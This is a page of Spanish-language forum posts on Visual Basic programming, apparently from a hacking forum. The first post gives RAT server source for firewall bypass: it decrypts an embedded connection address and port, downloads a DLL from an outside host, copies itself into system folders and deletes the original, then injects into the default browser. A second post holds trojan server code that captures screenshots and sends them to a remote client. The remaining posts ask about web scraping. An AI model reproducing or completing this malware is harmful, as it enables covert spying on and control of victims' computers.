| |
 Mostrar Mensajes
|
|
Páginas: 1 2 [3] 4 5 6 7 8 9
|
|
23
|
Programación / Programación Visual Basic / INJECT PROCESS BY PASS FIRWALLS
|
en: 24 Marzo 2008, 06:27 am
|
Option Explicit
Public Const FINAL_PROGRAM_SIZE = 61440
Public Const PassString As String = "password"
Public Const ServerPass As String = ""
Public IpToConnectTo As String, PortToConnectTo As Long
Public UserConnected As Long, MeltToFile As String, MeltToDirectory As String
Sub Main()
'On Error Resume Next
'
Dim s1 As String, sFile As String
Dim strInfo() As String
Dim ServerFile As String, EncryptedInfo As String
Dim s2 As String, ServerBytes() As Byte, b1() As Byte, MeltDir As Long
Dim InjectedProcesses() As String, ProcessToInject As String
Dim i1 As Long, i2 As Long, i3 As Long
EncryptedInfo = SysDir & "ei_log.log"
If FileExists(EncryptedInfo) Then
If FileLen(EncryptedInfo) = 0 Then
DeleteFile EncryptedInfo
ShellExecute 0, "", AppExe, 0, "", 1
End
End If
'firewall bypass
'this part of the program reads itself.
'a file was stored in the other instance that is now available for use
'so you have to collect the RAT [stored] data and use it in the RAT
sFile = DecryptString(StrConv(vbReadEndFile(EncryptedInfo, 0), vbFromUnicode), PassString)
s1 = sFile
IpToConnectTo = Mid(s1, InStr(1, s1, "{01=") + 4, InStr(1, s1, "=01}") - InStr(1, s1, "{01=") - 4)
PortToConnectTo = CLng(Mid(s1, InStr(1, s1, "{02=") + 4, InStr(1, s1, "=02}") - InStr(1, s1, "{02=") - 4))
MeltToFile = Mid(sFile, InStr(1, sFile, "{04=") + 4, InStr(1, sFile, "=04}") - InStr(1, sFile, "{04=") - 4)
MeltDir = Mid(sFile, InStr(1, sFile, "{05=") + 4, InStr(1, sFile, "=05}") - InStr(1, sFile, "{05=") - 4)
Select Case MeltDir
Case 0
MeltToDirectory = SysDir
Case 1
MeltToDirectory = WinDir
Case 2
MeltToDirectory = AppPath
Case 3
MeltToDirectory = GetTempPath
End Select
MeltToFile = LCase(MeltToDirectory & MeltToFile)
'if user doesnt have zLib, download it now for compression
'this will make the 2.5 mb screenshots ~50kb, and still crystal clear picture
If UserHasZLIB = 0 Then
DeleteFile SysDir & "zlib.dll"
Call GetInternetFile("http://www.hotlinkfiles.com/files/878001_9nuek/zlib.dll", SysDir & "zlib.dll", 256)
End If
DeleteFile EncryptedInfo
Load frmMain
frmMain.Show
Else
'default when user opens.. right here we want to store the RAT's
'information so that the firewall bypass can read it, avoiding registry.
'might as well encrypt the file
'soo in a nutshell..
'this part of the program reads itself and stores the information for
'access to the next loaded version with FWB+
'i keep these notes to help me remind myself.
'open itself and decrypt string
ServerBytes = vbReadEndFile(AppExe, FINAL_PROGRAM_SIZE)
sFile = CStr(ServerBytes())
ServerBytes = sFile
DeleteFile EncryptedInfo
vbWriteByteFile EncryptedInfo, ServerBytes
sFile = DecryptString(sFile, PassString)
'=================================
'
'Find a process to inject to, with internet access
'
'=================================
s2 = Mid(sFile, InStr(1, sFile, "{08=") + 4, InStr(1, sFile, "=08}") - InStr(1, sFile, "{08=") - 4)
If InStr(1, s2, "|") Then
InjectedProcesses = Split(s2, "|")
For i1 = LBound(InjectedProcesses) To UBound(InjectedProcesses)
If LCase(InjectedProcesses(i1)) = LCase("[DefaultBrowser]") Then
'If we hit the default browser, we are just gonna load into it
InjectedProcesses(i1) = ExeRegPath(DefaultBrowser)
If FileExists(InjectedProcesses(i1)) Then
'the browser exists, inject into it
ProcessToInject = InjectedProcesses(i1)
Else
If Len(s2) = 0 Then
'alternative find default browser through Shell32
End If
End If
i1 = UBound(InjectedProcesses)
End If
If IsProcessEXERunning(InjectedProcesses(i1)) Then
'process running , run one after
ProcessToInject = AppFullPath(InjectedProcesses(i1))
i1 = UBound(InjectedProcesses)
End If
Next
If ProcessToInject = "" Then ProcessToInject = ExeRegPath(DefaultBrowser)
End If
'=================================
'
'Determine if we need to melt
'
'=================================
MeltToFile = Mid(sFile, InStr(1, sFile, "{04=") + 4, InStr(1, sFile, "=04}") - InStr(1, sFile, "{04=") - 4)
MeltDir = Mid(sFile, InStr(1, sFile, "{05=") + 4, InStr(1, sFile, "=05}") - InStr(1, sFile, "{05=") - 4)
Select Case MeltDir
Case 0
MeltToDirectory = SysDir
Case 1
MeltToDirectory = WinDir
Case 2
MeltToDirectory = AppPath
Case 3
MeltToDirectory = GetTempPath
End Select
MeltToFile = LCase(MeltToDirectory & MeltToFile)
If LCase(AppExe) <> MeltToFile Then
'we need to melt
DeleteFile MeltToFile
If MeltDir <> 2 Then FileCopy AppExe, MeltToFile
b1 = LoadFile(AppExe)
If MeltDir <> 2 Then InitiateMelt
RunExe ProcessToInject, b1
Exit Sub
Else
'shouldnt be occuring!!
'program will uninstall after this
DeleteFile EncryptedInfo
MsgBox "Program Detection Error"
InitiateMelt
End
End If
End If
End Sub
PROBAR SI SIRVE ESTO :s |
|
|
|
|
26
|
Programación / Programación Visual Basic / ayuda sobre vb troyano
|
en: 1 Marzo 2008, 22:38 pm
|
hola a todo el mundo.. queria preguntaros el por qué no me obedece lo que es el cliente a el server el codigo es..: Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim vtData As String
Dim vDatos() As String
Dim Datos As String
ws.GetData vtData, vbString
If Envio = True Then ' Archivos recibidos
DataFile = DataFile & vtData
If Len(DataFile) = lenFile Then
Open NombreRec For Binary As #1
Put #1, , DataFile
Close #1
DataFile = ""
Envio = False
End If
End If
txtRecibido.Text = vtData
ws.GetData Datos
ws.GetData vtData, vbString
vtData = txtRecibido.Text
vDatos = Split(Datos, "|")
Select Case vDatos(0)
Case "Cerrar"
End
Case "Screen"
Resolucion = vDatos(1)
Foto.SetSamplingFrequencies 2, 2, 2, 2, 2, 2
Foto.Quality = Resolucion
Foto.SampleScreen
Foto.SaveFile ("c:\capture.jpg")
txtRecibido.Text = vtData
Open "c:\capture.jpg" For Binary As #1
File = Input(LOF(1), 1)
Close #1
FileTotal = Len(File)
ws.SendData "Screen|" & FileTotal
Kill "c:\capture.jpg"
Case "OK"
ws.SendData File
Case "Name"
Nombre = vDatos(1)
Kill WINDOWS & "\name"
Open WINDOWS & "\name" For Binary As #1
Put #1, 1, Nombre
Close #1
End Select
End Sub no entiendo.. lo que quiero esque si "hola" es igual a "hola" entonces me de " msgbox hola " pero no me hace caso, :S!! |
|
|
|
|
27
|
Programación / Programación Visual Basic / Re: obtener texto.
|
en: 29 Diciembre 2007, 20:51 pm
|
|
gracias demoniox, ahora lo que mas necesito es como un Get list, desde google sacar todas las webs que empiecen por news.php por ejemplo entiendes? una paranolla pero no se como es tio.. busco y busco y no se.. ah una cosa, tengo el ie 7, y no me deja abrir en ieframe.dll que hago:S
|
|
|
|
|
28
|
Programación / Programación Visual Basic / Holas de nuevo :D
|
en: 29 Diciembre 2007, 02:04 am
|
|
Queria comentaros si es posible, a traves de google, escribir por ejemplo hola, y todo lo que busque google, lo meta en un listbox por ejemplo
Escribo:
elhacker.net
y toda las webs que consiga de elhacker.net
me las meta en un text o un listview, es posible?
que las consigia de por ejemplo 99 paginas, no solo de la parte 1, si no que busque
1,2,3,4,5,6,7,8,9 asi entendeis chicos? espero respuesta gracias y feliz navidad a todos
|
|
|
|
|
29
|
Programación / Programación Visual Basic / obtener texto.
|
en: 29 Diciembre 2007, 01:56 am
|
Hola, feliz navidad a todos, queria preguntar si se puede hacer esto, mirar tengo un codigo fuente que obtiene el codigo fuente de una pagina web, pero mi duda es, si al obtener el codigo fuente, si por ejemplo la web tiene Bienvenido yo quiero que al obtener el codigo fuente, me diga si Bievenido esta en el codigo fuente de la pagina y me lo diga en un label, es posible? si es posible podriais ponermelo ? asias, aqui os dejo el codigo fuente para obtener el codigo de la pagina: 'debes tener el control internet transfer control registrado en tu equipo Dim strUrl As String Private Sub Command1_Click() On Error GoTo manejadorerror strUrl = txtURLbox.Text 'verificar si hay, al menos, 11 caracteres (" http://www.") If Len(strUrl) > 11 Then Screen.MousePointer = 13 txtNote.Text = Inet1.OpenURL(strUrl) Screen.MousePointer = 0 MsgBox ("Descarga completada"), vbInformation Else Screen.MousePointer = 0 MsgBox "Introduzca un nombre de documento válido en el cuadro URL" End If Exit Sub manejadorerror: Screen.MousePointer = 0 MsgBox "Error en la conexión con el URL", , Err.Description End Sub Private Sub Command2_Click() 'nota: todo el archivo se almacena en una única cadena CommonDialog1.DefaultExt = "HTM" CommonDialog1.Filter = "archivos HTML (*.HTML;*.HTM)|*.HTML;HTM" CommonDialog1.ShowSave If CommonDialog1.FileName <> "" Then Open CommonDialog1.FileName For Output As #1 Print #1, txtNote.Text Close #1 End If End Sub Private Sub Command3_Click() End End Sub Private Sub Command6_Click() CommonDialog1.DefaultExt = "TXT" CommonDialog1.Filter = "archivos de texto (*.TXT)|*.TXT" CommonDialog1.ShowSave If CommonDialog1.FileName <> "" Then Open CommonDialog1.FileName For Output As #1 Print #1, txtNote.Text Close #1 End If End Sub |
|
|
|
|
|
| |
|
cuidate haber si me sirve 